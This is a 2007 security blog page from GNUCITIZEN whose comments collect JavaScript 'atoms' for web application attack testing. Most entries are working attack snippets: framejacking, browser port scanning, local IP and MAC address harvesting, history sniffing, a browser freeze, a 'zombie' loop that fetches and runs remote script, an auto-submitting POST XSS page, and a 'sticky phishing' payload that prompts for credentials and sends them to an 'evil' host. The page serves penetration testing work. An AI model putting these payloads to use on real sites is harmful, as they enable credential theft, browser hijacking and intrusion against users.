Atom Database

published: January 20th, 2007

Atom is The smallest part of a substance which can exist and still retain the properties of the substance. All familiar matter consists of atoms. An atom consists of a positively charged nucleus and orbiting electrons. The simplest atom is hydrogen (one proton and one electron), and the largest atom in nature is uranium (92 protons, 92 electrons, and 146 neutrons). KU

The purpose of this project is to collect useful attack snippets (atoms) which can be employed when performing WEB Application Security testing. Atom submissions must follow certain format which is:

Atom name - It must be enclosed inside <h3>[atom name here]</h3> tags.
Atom description - It must start on a new paragraph.
Atom code - It must be enclosed inside <pre><code>[atom code here]</code></pre> tags.
Atom tags - It mus be a comma separated string.

» more | » comments rss | posted by pdp | syndication and integration ( )

comments

pdp responds:

Framejack

Hijack the current user browser window. This technique employs a single 100%x100% frame that sits on the top of the currently exploited remote content. When the user interacts with the browser window or tab the attacker persists state. This state is lost as soon as the user moves to another URL.

function framejack(url) {
	var ifr = document.createElement('iframe');
	ifr.src= url;

	document.body.scroll = 'no';
	document.body.appendChild(ifr);

	ifr.style.position = 'absolute';
	ifr.style.width = ifr.style.height = '100%';
	ifr.style.top = ifr.style.left = ifr.style.border = 0;
}

All Browsers, JavaScript, hijack, frame, persistency

pdp responds:

getNetInfo

Retrieve network information. By using this function attackers can retrieve information about the local NATed IP address and host name. This information is highly sensitive since it enables attackers to conduct attacks on Intranet resources.

function getNetInfo() {
	var sock = new java.net.Socket();
	sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
	sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
	return {domain: sock.getLocalAddress().getHostName(), ip: sock.getLocalAddress().getHostAddress()};
}

Firefox, Opera, Live Connect, JavaScript, Information Gathering

pdp responds:

Freeze

Freeze the browser for defined time. The time is in milliseconds. While frozen, users are unable to interact with the browser. Certain browsers may terminate the script if the time value is too high. Attackers can use this function to force the browser to wait until certain remote event occurs.

function freeze(time) {
	var date = new Date();
	var cur = null;

	do {
		cur = new Date();
	} while(cur - date < time);
}

All Browsers, JavaScript, freeze, DoS

pdp responds:

googleAjaxSearch

Perform searches with Google from the browser. This technique can be employed by attackers in order to make self-propagating Ajax worms. The worms finds new targets via Google and uses your browser to attack.

function googleAjaxSearch(callback, query, key, context) {
	if (googleAjaxSearch.callbacks == undefined)
		googleAjaxSearch.callbacks = new Array();

	var key = (key == undefined)?'internal-documentation':key;
	var context = (context == undefined)?0:context;

	var script = document.createElement('script');
	script.defer = true;
	script.type = 'text/javascript';
	script.src = 'http://www.google.com/uds/GwebSearch?callback=googleAjaxSearch.callbacks.callback' + googleAjaxSearch.callbacks.length + '&context=' + context + '&lstkp=0&rsz=large&hl=en&q=' + query + '&key=' + key + '&v=0.1';

	googleAjaxSearch.callbacks['callback' + googleAjaxSearch.callbacks.length] = function (context, results, status) {
		document.body.removeChild(script);
		delete googleAjaxSearch.callbacks['callback' + googleAjaxSearch.callbacks.length];
		callback(results, query, key, context, status);
	};

	document.body.appendChild(script);
}

All Browsers, JavaScript, Google, search

pdp responds:

portScan

Perform port scanning. This not the only way attackers can perform port scanning. You need to adjust the timeout value in order to achieve the most desired result. This technique can be quite inaccurate sometimes.

function portScan(callback, target, ports, timeout) {
	var timeout = (timeout == null)?100:timeout;

	for (index = 0; index < ports.length; index++)
 		new function () {
			var img = new Image();
			img.onload = img.onerror = function () {
				if (!img) return;
				img = undefined;
				callback(target, ports[index], true);
			};
			img.src = 'http://' + target + ':' + ports[index];

			window.setTimeout(function () {
				if (!img) return;
				img = undefined;
				callback(target, ports[index], false);
			}, timeout);
		};
}

All Browsers, JavaScript, portscan

pdp responds:

getURLJ

Retrieve remote content by using Java Live Connect. This function is very suitable when a binary files is required to be downloaded. Works only on Live Connect browsers.

function getURLJ(url) {
	var data = null;
	var destination = new java.net.URL(url);
	var buffer = java.lang.reflect.Array.newInstance(java.lang.Byte.TYPE, 65536);
	var stream = destination.getContent();

	while (true) {
		var count = stream.read(buffer);

		if (count <= 0)
			break;

		var str = new java.lang.String(buffer, 0, count);
		data += str;
	}

	stream.close();
	return data;
}

Firefox, Opera, Live Connect, JavaScript

pdp responds:

zombie

Attach a zombie. This function will perform queries to “url” on a regular basis (specified by interval). Retrieved data is evaluated as a JavaScript expressions.

function zombie(url, interval) {
	var interval = (interval == null)?2000:interval;

	setInterval(function () {
		var script = document.createElement('script');
		script.defer = true;
		script.type = 'text/javascript';
		script.src = url;
		document.body.appendChild(script);
	}, interval);
}

All Browsers, JavaScript, zombie

pdp responds:

getDocument

Retrieve the document object in a cross-browser manner. This function is very useful when the attacker want to read the content of a particular iframe or frame.

function getDocument(target) {
	if (target == undefined)
		return document;
	else if (target.contentDocument)
		return target.contentDocument;
	else if (target.contentWindow)
		return target.contentWindow.document;
	else if (target.document)
		return target.document;
	else
		throw 'unable to get document object';
}

All Browsers, JavaScript, document, iframe

pdp responds:

historyScan

Scan user history. This function enumerates the current user visited links by performing checks on their style.

function getDocument(target) {
	if (target == undefined)
		return document;
	else if (target.contentDocument)
		return target.contentDocument;
	else if (target.contentWindow)
		return target.contentWindow.document;
	else if (target.document)
		return target.document;
	else
		throw 'unable to get document object';
}

function historyScan(callback, URLs) {
	var iframe = document.createElement('iframe');
	iframe.style.visibility = 'hidden';
	document.body.appendChild(iframe);

	var doc = getDocument(iframe);
	doc.open();
	doc.write('<style>a:visited{display: none}</style>');
	doc.close();

	for (index = 0; index < URLs.length; index++) {
		var a = doc.createElement('a');
		a.href = URLs[index];
		doc.body.appendChild(a);

		if (a.currentStyle)
			var display = a.currentStyle['display'];
		else
			var display = doc.defaultView.getComputedStyle(a, null).getPropertyValue('display')

		callback(URLs[index], display == 'none'?true:false);
	}

	document.body.removeChild(iframe);
}

All Browsers, JavaScript, history, scan

pdp responds:

b64encode

This function encodes a string in base64 format.

function b64encode(input) {
	var b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';

	var result = '';
	var chr1, chr2, chr3;
	var enc1, enc2, enc3, enc4;
	var i = 0;

	do {
		chr1 = input.charCodeAt(i++);
		chr2 = input.charCodeAt(i++);
		chr3 = input.charCodeAt(i++);

		enc1 = chr1 >> 2;
		enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
		enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
		enc4 = chr3 & 63;

		if (isNaN(chr2)) {
			enc3 = enc4 = 64;
		} else if (isNaN(chr3)) {
			enc4 = 64;
		}

		result += b64chars.charAt(enc1) + b64chars.charAt(enc2) + b64chars.charAt(enc3) + b64chars.charAt(enc4);
	} while (i < input.length);

	return result;
}

JavaScript, Cross-platformed, base64, Encodings

pdp responds:

b64decode

This function decodes base64 strings.

function b64decode(input) {
	var b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';

	var result = '';
	var chr1, chr2, chr3;
	var enc1, enc2, enc3, enc4;
	var i = 0;

	var input = input.replace(/[^A-Za-z0-9\+\/\=]/g, '');

	do {
		enc1 = b64chars.indexOf(input.charAt(i++));
		enc2 = b64chars.indexOf(input.charAt(i++));
		enc3 = b64chars.indexOf(input.charAt(i++));
		enc4 = b64chars.indexOf(input.charAt(i++));

		chr1 = (enc1 << 2) | (enc2 >> 4);
		chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
		chr3 = ((enc3 & 3) << 6) | enc4;

		result += String.fromCharCode(chr1);

		if (enc3 != 64)
			result += String.fromCharCode(chr2);

		if (enc4 != 64)
			result += String.fromCharCode(chr3);
	} while (i < input.length);

	return result;
}

JavaScript, Cross-platformed, base64, Encodings

kuza55 responds:

Firefox B64 Functions

These functions are part of the javascript window object in the Gecko engine.

alert (btoa("test"));
alert (atob("dGVzdA=="));

JavaScript, Firefox, base64, Encodings

pdp responds:

include

Load a remote script file. This function is non-blocking which means that you have to wait for the script to load before using its declarations.

function include(url) {
	document.write('<' + 'script src="' + url + '" language="javascript" type="text/javascript"' + '>' + '<' + '/script' + '>');
}

JavaScript, All Browsers, include, modules

pdp responds:

include

Load a remote script file. This function is non-blocking which means that you have to wait for the script to load before using its declarations. For that reason you may want to use the onload callback function.

function include(url, onload) {
	var script = document.createElement('script');
	script.type = 'text/javascript';
	script.onload = onload;
	script.src = url;
	document.body.appendChild(script);
}

Mozilla, Firefox, Opera, include, modules

pdp responds:

forcefocus

This function can be used to force the focus on a particular element from the current dom.

function forcefocus(target, timeout) {
	var timeout = (timeout == undefined) ? 500 : timeout;

	target.focus();

	setTimeout(function () {
		forcefocus(target);
	}, timeout);
}

All Browsers, focus

pdp responds:

walkJSON

This function walk the entire JSON (the j parameter) tree. The c parameter is the function that handles walked nodes.

function walkJSON(j, c) {
    if (typeof(c) != 'function') {
        return;
    }

    for (var i in j) {
        c(i, j[i]);

        if (j[i] instanceof Array || typeof(j[i]) == 'object') {
            arguments.callee(j[i], c);
        }
    }
}

universal

pdp responds:

parseURL

This function parse the URL into an object.

function parseURL(url) {
	var REGEX = /^((\w+):\/\/)?((\w+):?(\w+)?@)?([^\/\?:]+):?(\d+)?(\/?[^\?#]+)?\??([^#]+)?#?(\w*)/;

	var fields = {'href': 0, 'username' : 4, 'password' : 5, 'port' : 7, 'protocol' : 2, 'host' : 6, 'hostname' : 6, 'pathname' : 8, 'search' : 9, 'hash' : 10};
	var result = new Object();
	var r = REGEX.exec(url);

	for (var field in fields) {
		result[field] = r[fields[field]];
	}

	result.hash = result.hash?'#' + result.hash:'#';
	result.search = result.search?'?' + result.search:'?';
	result.username = result.username?result.username:'';
	result.password = result.password?result.password:'';

	if (result.port == undefined) {
		switch (result.protocol) {
			case 'http':
				result.port = 80;
				break;
			case 'https':
				result.port = 443;
				break;
			case 'ftp':
				result.port = 21;
				break;
			default:
				result.port = '';
				break;
		}
	}

	return result;
}

universal

pdp responds:

the ATOM database is closed for new submissions. we are going re-open the service once we deploy the new application infrastructure.

Adrian Pastor responds:

STICKY PHISHING

This payload launches a phishing attack to the user. It’s sticky cuz it won’t stop prompting the victim to enter his username and password until he enters both. Once obtained they are forwarded to a third-party site. Ideal for persistent XSS attacks.

do{a=prompt("APP_OR_SITE_NAME: an error has ocurred\nPlease enter your USERNAME","");b=prompt("APP_OR_SITE_NAME: an error has ocurred\nPlease enter your PASSWORD","");} while(a==null || b==null || a=="" || b=="");alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b

JavaScript, Universal, Password Theft

Adrian Pastor responds:

POST METHOD XSS

Attack HTML page for XSS vuls that can only be exploited as a POST request (as opposed to GET)

<html>
<!-- this page would be hosted on the attacker's site and the victim would need to be tricked into visiting it -->
<form method="post" action="http://target/vulnerable.jsp">
<input type="text" name="param" value='<script>alert("XSS")</script>'>
</form>
<script>document.forms[0].submit();</script>
</html>

Universal, HTML, JavaScript

yUnwEb responds:

MAC ADDRESS

You can steal the user’s MAC address with Java 1.6. For Internet Explorer you can use an applet. This information is very sensitive, because the MAC address is a unique identifier. Although it can be easily changed by the user, it can be useful to identify some users with dynamic IP address or using proxies.

function get_mac() {
    try {
        var ifaces = java.net.NetworkInterface.getNetworkInterfaces()
        var ifaces_list = java.util.Collections.list(ifaces);
        for (var i = 0; i < ifaces_list.size(); i++) {
            var mac = ifaces_list.get(i).getHardwareAddress();
            if (mac) {
                return mac;
            }
        }
    } catch (e) { }
    return false;
}

Firefox, Opera, Live Connect, Java SE 6, JavaScript, Information Gathering

respond

In order to preserve the high standards of GNUCITIZEN, before you post a comment, please take note of the following guidelines:

Commenting is provided as a courtesy only.
Please be brief and relevant to the post.
Please be polite even in disagreement with us or others.
Support claims you wish to make using sources and links.
No personal attacks, name calling, or commercial commenting.
Anyone creating false or multiple identities will be banned.
If you don't have a cogent argument, you will be censored.
If you are purposefully deceptive, you will be censored.
No spamming or flooding.

We appreciate your time and effort in contributing to GNUCITIZEN.

name: (required)

mail: (required)

website:

comment:

	Blogsecurify is a division of GNUCITIZEN. The initiative was established to provide social media security services through our free automated testing engine. The Blogsecurify team is also engaged to deliver quality content on issues concerning social media technologies.
	Netsecurify is a division of GNUCITIZEN. The initiative was established to provide network security services through our free automated testing engine. The service is still in private-beta.
	Websecurify is a division of GNUCITIZEN. The initiative was established to provide a fee web application security framework for automated and manul penetration testing. The service is still in private-beta.
	Secapps serves as an application directory of all online tools which the GNUCITIZEN team has built over the years.
	Securls serves as an information security intelligence tool, combining news and articles from the best information security resources online.

GNUCITIZEN

navigation

Atom Database

comments

Framejack

getNetInfo

Freeze

googleAjaxSearch

portScan

getURLJ

zombie

getDocument

historyScan

b64encode

b64decode

Firefox B64 Functions

include

include

forcefocus

walkJSON

parseURL

STICKY PHISHING

POST METHOD XSS

MAC ADDRESS

respond

GNUCITIZEN Products

Cutting-edge Network